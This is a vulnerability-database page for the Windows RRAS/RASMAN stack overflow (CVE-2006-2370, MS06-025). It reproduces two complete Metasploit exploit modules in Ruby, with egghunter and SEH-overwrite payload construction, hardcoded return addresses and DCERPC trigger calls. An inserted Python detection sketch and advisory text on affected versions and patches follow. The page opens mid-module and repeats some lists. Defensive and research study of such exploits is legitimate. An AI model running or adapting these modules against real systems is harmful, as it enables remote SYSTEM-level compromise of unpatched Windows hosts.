			response = dcerpc.call(0xA, stubdata)

		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end

		

- Vulnerability information (F83149)

Microsoft RRAS Service RASMAN Registry Overflow (PacketStormID:F83149)
2009-11-26 00:00:00
H D Moore,Pusscat  metasploit.com
exploit,remote,overflow,registry
windows,2k
CVE-2006-2370

This Metasploit module exploits a registry-based stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RRAS Service RASMAN Registry Overflow',
			'Description'    => %q{
        		This module exploits a registry-based stack overflow in the Windows Routing 
				and Remote Access Service. Since the service is hosted inside svchost.exe, 
				a failed exploit attempt can cause other system services to fail as well. 
				A valid username and password is required to exploit this flaw on Windows 2000. 
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
				Exploiting this flaw involves two distinct steps - creating the registry key
				and then triggering an overwrite based on a read of this key. Once the key is
				created, it cannot be recreated. This means that for any given system, you
				only get one chance to exploit this flaw. Picking the wrong target will require
				a manual removal of the following registry key before you can try again:
				HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
            },
			'Author'         => [ 'pusscat', 'hdm' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ] 
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ],  # call esi
				],
			'DefaultTarget' => 0))
		register_options(
			[       
				OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
			], self.class)		
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end
	
	def exploit
		connect()
		smb_login()
		print_status("Trying target #{target.name}...")

		# Generate the egghunter payload
		hunter = generate_egghunter()
		egg    = hunter[1]
		
		# Pick a "filler" character that we know doesn't get mangled
		# by the wide string conversion routines		
		filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
		fil    = filset[ rand(filset.length) ].chr
		
		# Bind to the actual DCERPC interface
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		print_status("Binding to #{handle}")
		dcerpc_bind(handle)
		print_status("Bound to #{handle}")

		# Add giant blocks of guard data before and after the egg 
		eggdata  = 
			fil * 1024 +
			egg + 
			egg + 
			payload.encoded + 
			fil * 1024
			
		# Place the egghunter where ESI happens to point
		bof = (fil * 178)
		bof[84, hunter[0].length] = hunter[0]
		
		# Overwrite the SEH ptr, even though ESP is smashed
		# The handle after the ret must be an invalid address
        pat = 
			(fil * 886) + 
			NDR.long(target.ret) + 
			(fil * 3) + "\xc0" +
			bof
			
        type2 = 
			NDR.string( (fil * 1024) + "\x00" ) +
			NDR.string( pat + "\x00" ) +
			NDR.string( (fil * 4096) + "\x00" ) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) 
          
        type1 = 
            NDR.long(rand(0xffffffff)) + # OperatorDial
            NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
            NDR.long(rand(0xffffffff)) + # UseLocation
            NDR.long(rand(0xffffffff)) + # ShowLights
            NDR.long(rand(0xffffffff)) + # ShowConnectStatus
            NDR.long(rand(0xffffffff)) + # CloseOnDial
            NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
            NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
            NDR.long(rand(0xffffffff)) + # SkipConnectComplete
            NDR.long(rand(0xffffffff)) + # NewEntryWizard
            NDR.long(rand(0xffffffff)) + # RedialAttempts
            NDR.long(rand(0xffffffff)) + # RedialSeconds
            NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
            NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
            NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
            NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
            NDR.long(rand(0xffffffff)) + # CallbackMode

            NDR.long(0x45) + type2 +     # Parsed by CallbackListFromRpc
            NDR.wstring("\x00" * 129)  +
            NDR.long(rand(0xffffffff)) +
            NDR.wstring("\x00" * 520)  +
            NDR.wstring("\x00" * 520)  +

            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +

            NDR.string("\x00" * 514) +
            
			NDR.long(rand(0xffffffff)) + 
            NDR.long(rand(0xffffffff))  
        
		stubdata = 
			type1 + 
			NDR.long(rand(0xffffffff)) + 
			eggdata
			
        print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

		begin
			print_status('Creating the malicious registry key...')
			response = dcerpc.call(0xA, stubdata)
			
			print_status('Triggering the base pointer overwrite...')
			response = dcerpc.call(0xA, stubdata)
			
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end
    

- Vulnerability information (F83082)

Microsoft RRAS Service Overflow (PacketStormID:F83082)
2009-11-26 00:00:00
H D Moore,Nicolas Pouvesle  metasploit.com
exploit,remote,overflow
windows,2k
CVE-2006-2370

This Metasploit module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
        		This module exploits a stack overflow in the Windows Routing and Remote
				Access Service. Since the service is hosted inside svchost.exe, a failed 
				exploit attempt can cause other system services to fail as well. A valid
				username and password is required to exploit this flaw on Windows 2000. 
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
			'Author'         => 
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ] 
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
						
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end
	
	def exploit	
		
		connect()
		smb_login()

		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')
		
		# Check the remote OS name and version
		os = smb_peer_os
		pat = ''
		
		case os
		when /Windows 5\.0/
			pat = 
				payload.encoded +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			pat =
				rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'				
		end
			
		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		stb = 
			NDR.long(0x20000) +
			NDR.long(len) +
			req           + 
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")
		
		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
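
A defender-side counterpart to the module above, added here as an illustration and not part of the Metasploit module or of this advisory: it scans the raw connection-oriented DCE/RPC PDUs of one session for a bind to the interface UUID the module uses and for a later request to opnum 0x0C on that presentation context. The function names, the constructed sample PDUs and the srvsvc interface used as a benign contrast are assumptions made for the example.

```python
import struct
import uuid

# Interface UUID and opnum as they appear in the module above.
RRAS_IF = uuid.UUID("20610036-fa22-11cf-9823-00a0c911e5df")
WATCH_OPNUM = 0x0C
PT_REQUEST, PT_BIND = 0, 11

def inspect_pdus(pdus):
    """Scan raw connection-oriented DCE/RPC PDUs from one session; return findings."""
    rras_ctx, findings = set(), []
    for pdu in pdus:
        if len(pdu) < 24 or pdu[0] != 5:
            continue                                  # not DCE/RPC version 5
        e = "<" if pdu[4] & 0x10 else ">"             # byte order from the data representation
        frag_len, auth_len = struct.unpack_from(e + "HH", pdu, 8)
        if frag_len > len(pdu):
            continue                                  # truncated: never read past the capture
        if pdu[2] == PT_BIND and frag_len >= 28:
            off = 28                                  # first presentation context element
            for _ in range(pdu[24]):
                if off + 24 > frag_len:
                    break
                ctx_id, n_xfer = struct.unpack_from(e + "HB", pdu, off)
                raw = pdu[off + 4:off + 20]
                if_uuid = uuid.UUID(bytes_le=raw) if e == "<" else uuid.UUID(bytes=raw)
                if if_uuid == RRAS_IF:
                    rras_ctx.add(ctx_id)
                    findings.append(("bind", ctx_id))
                off += 24 + 20 * n_xfer               # skip this element's transfer syntaxes
        elif pdu[2] == PT_REQUEST:
            ctx_id, opnum = struct.unpack_from(e + "HH", pdu, 20)
            stub_off = 40 if pdu[3] & 0x80 else 24    # optional object UUID precedes the stub
            trailer = auth_len + 8 if auth_len else 0
            if ctx_id in rras_ctx and opnum == WATCH_OPNUM:
                findings.append(("request", opnum, max(frag_len - stub_off - trailer, 0)))
    return findings

def make_pdu(ptype, body):  # constructed sample builder: little-endian, no auth, call_id 1
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, 3, b"\x10\0\0\0", 16 + len(body), 0, 1) + body

def ctx_elem(ctx_id, if_uuid):  # one presentation context offering the NDR transfer syntax
    ndr = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
    head = struct.pack("<HBB", ctx_id, 1, 0) + if_uuid.bytes_le + struct.pack("<HH", 1, 0)
    return head + ndr.bytes_le + struct.pack("<I", 2)

OTHER_IF = uuid.UUID("4b324fc8-1670-01d3-1278-5a47bf6ee188")  # srvsvc, benign contrast
SAMPLE = [                                                    # constructed PDUs, filler stubs only
    make_pdu(11, struct.pack("<HHIBBH", 4280, 4280, 0, 2, 0, 0) + ctx_elem(0, RRAS_IF) + ctx_elem(1, OTHER_IF)),
    make_pdu(0, struct.pack("<IHH", 64, 1, 0x0C) + b"\0" * 64),   # same opnum, other interface
    make_pdu(0, struct.pack("<IHH", 64, 0, 0x0C) + b"\0" * 64),   # RRAS context, watched opnum
]
```

The stub length is reported rather than judged, because the page does not state the size of the vulnerable buffer; on a patched estate the bind finding alone is usually the more useful signal.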
    

- Vulnerability Information

26437
Microsoft Windows RRAS RASMAN Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability Description

An unspecified remote overflow exists in Windows. The RASMAN component of RRAS fails to validate unspecified network traffic resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-06-13 Unknown
2006-06-27 2006-07-27

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Microsoft Windows Routing and Remote Access Remote Code Execution Vulnerability
Boundary Condition Error 18325
Yes No
2006-06-13 12:00:00 2006-06-29 06:09:00
The vendor disclosed this vulnerability.

- Affected Versions

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- Discussion

Microsoft Windows Routing and Remote Access is prone to a memory-corruption vulnerability. This issue is due to the software's failure to properly bounds-check user-supplied network data before copying it to an insufficiently sized memory buffer.

This issue allows remote attackers to execute arbitrary machine code on affected computers with SYSTEM-level privileges. This facilitates the complete compromise of affected computers.

Exploiting this issue on Microsoft Windows XP SP2 or Windows Server 2003 requires valid login credentials. Anonymous attacks are possible with Windows 2000 and Windows XP versions prior to SP2.

- Exploit

A proof-of-concept exploit is available to members of the Immunity Partner's Program. No publicly available exploit is known to exist at this time.

The exploit is available from the following location:

https://www.immunityinc.com/downloads/immpartners/ms06_025b.tar

It is currently unknown if this exploit targets the vulnerability reported in this BID or the one described in BID 18358, since they were both addressed in Microsoft Security Advisory MS06-025.

Two Metasploit framework exploit modules are available:

rras_ms06_025.pm
rras_ms06_025_rasman.pm

- Solution

Microsoft has released an advisory along with fixes to address this issue. Please see the referenced advisory for more information.

Microsoft has updated security bulletin MS06-025 to re-release fixes to address issues affecting customers using a terminal window or dial-up scripting with dial-up connections. The vendor has also resolved issues involving scripts to change device configuration parameters using the following commands:

- set port parity
- set port databits
- set port stopbits

These issues arose for users after installing the original fixes released as part of MS06-025. More information is available in Microsoft's Knowledge Base Article 911280. Please see the references for details.


Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows XP Professional SP2
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows XP Professional SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- References

 

 
